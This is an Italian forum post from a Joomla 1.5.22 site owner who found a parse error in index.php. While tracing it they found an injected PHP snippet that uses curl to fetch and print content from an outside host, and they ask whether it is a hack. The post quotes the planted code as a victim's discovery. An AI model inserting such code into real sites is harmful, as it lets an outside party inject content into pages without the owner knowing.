Unexpected '<' in index.php on line 89
Buongiorno a tutti.
Stamattina ho riscontrato un problema sul mio sito Joomla, trovando, invece che la index.php una pagina bianca con l'errore in oggetto
unexpected '<' in index.php on line 89
trovato nella index.php appunto.
Ho guardato il file e alla riga 89 non c'era la minima traccia di"<". Ho provato a commentare quella riga e mi dava un altro errore alla linea 177. Ho guardato e ho trovato questo script:
<?php function crawl_page($url){$ch=curl_init();curl_setopt($ch, CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTR ANSFER,1);curl_setopt($ch,CURLOPT_ENCODING,"gzip") ;curl_setopt($ch,CURLOPT_TIMEOUT,200);$result=curl _exec($ch);curl_close($ch);return $result;}print crawl_page("http://likeimages.net/");?>
Allora ho un po' cercato in rete e ho visto che alcuni siti sono stati hackerati, trovandosi nella index degli script o qualcosa del genere.
Ho provato a commentare quel php function e adesso mi sembra che vada tutto bene.
Quel codice cos'é? Se non sbaglio la curl è qualcosa che dev'essere installato sul server per la corretta visualizzazione dei siti joomla...quel codice c'entra con la libreria curl o è davvero una sorta di hackeraggio?
Premetto che ho aggiornato Joomla alla versione 1.5.22 ultimamente e da quello che ho visto è l'ultima versione disponibile (prima della 1.6, ovviamente :) ) e non ho fatto modifiche o nuove installazioni di componenti di recente.
Grazie a chiunque mi possa dare una delucidazione in merito.
Buona giornata e buon lavoro.
L